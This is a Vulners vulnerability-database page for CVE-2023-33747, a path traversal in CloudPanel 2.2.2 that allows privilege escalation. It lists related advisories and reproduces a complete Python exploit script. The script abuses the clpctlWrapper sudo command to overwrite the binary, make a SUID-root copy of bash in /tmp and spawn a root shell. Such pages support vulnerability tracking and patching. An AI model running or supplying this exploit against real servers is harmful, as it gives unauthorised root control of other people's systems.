Vulners
Lucene search
CloudPanel 2.2.2 Privilege Escalation / Path Traversal Exploit
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | CVE-2023-33747 | 6 Jun 202318:15 | – | attackerkb |
 | The vulnerability of the clpctlWrapper command in the server and CloudPanel management panel allows a attacker to increase their privileges. | 3 Mar 202500:00 | – | bdu_fstec |
 | CVE-2023-33747 | 22 Oct 202412:42 | – | circl |
 | MGT-COMMERCE CloudPanel 路径遍历漏洞 | 6 Jun 202300:00 | – | cnnvd |
 | CVE-2023-33747 | 6 Jun 202300:00 | – | cve |
 | CVE-2023-33747 | 6 Jun 202300:00 | – | cvelist |
 | EUVD-2023-37899 | 3 Oct 202520:07 | – | euvd |
 | CVE-2023-33747 | 6 Jun 202318:15 | – | nvd |
 | CloudPanel 2.2.2 Privilege Escalation / Path Traversal | 7 Jun 202300:00 | – | packetstorm |
 | Path traversal | 6 Jun 202318:15 | – | prion |
10
# Title : Privilege Escalation through path traversal
# CVE ID : CVE-2023-33747
# Exploit Author : EagleEye
# Github : https://github.com/EagleTube/CloudPanel/tree/main/CVE-2023-33747
# Version Affected : CloudPanel v2.0.0 - v2.2.2
# Vendor : CloudPanel.io
# Date : 31/05/2023 , 12:00 PM
# Step : Login as ssh as user, and run `python3 CVE-2023-33747_GetRoot.py`
# Date : 06 June 2023
# CVE-2023-33747_GetRoot.py
import os
import subprocess
def exec_command(command):
process = subprocess.Popen(command.split(), stdout=subprocess.PIPE)
output, error = process.communicate()
def exploit():
print('[+] Overriding file to writable')
exec_command('sudo /usr/bin/clpctlWrapper system:permissions:reset --files=777 --path=../../../../../../../../../../usr/bin/clpctlWrapper')
print('[+] Backup clpctlWrapper into tmp...')
exec_command('cp /usr/bin/clpctlWrapper /tmp/clpctlWrapper')
print('[+] Replacing clpctlWrapper with cp...')
exec_command('cp /bin/bash /tmp/bash')
print('[+] Assigning suid to /tmp/bash...')
exec_command('cp /bin/chown /usr/bin/clpctlWrapper')
exec_command('sudo /usr/bin/clpctlWrapper root:root /tmp/bash')
exec_command('cp /bin/chmod /usr/bin/clpctlWrapper')
exec_command('sudo /usr/bin/clpctlWrapper 6755 /tmp/bash')
exec_command('cp /tmp/clpctlWrapper /usr/bin/clpctlWrapper')
print('[+] Popping root shell...')
os.system('/tmp/bash -p -c "chown root:root /usr/bin/clpctlWrapper && chmod 0700 /usr/bin/clpctlWrapper && python3 root.py"')
if __name__ == '__main__':
exploit()
# root.py
import os
os.setreuid(0,0)
os.setregid(0,0)os.system('/bin/bash')
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
07 Jun 2023 00:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.17.8
EPSS0.00366
SSVC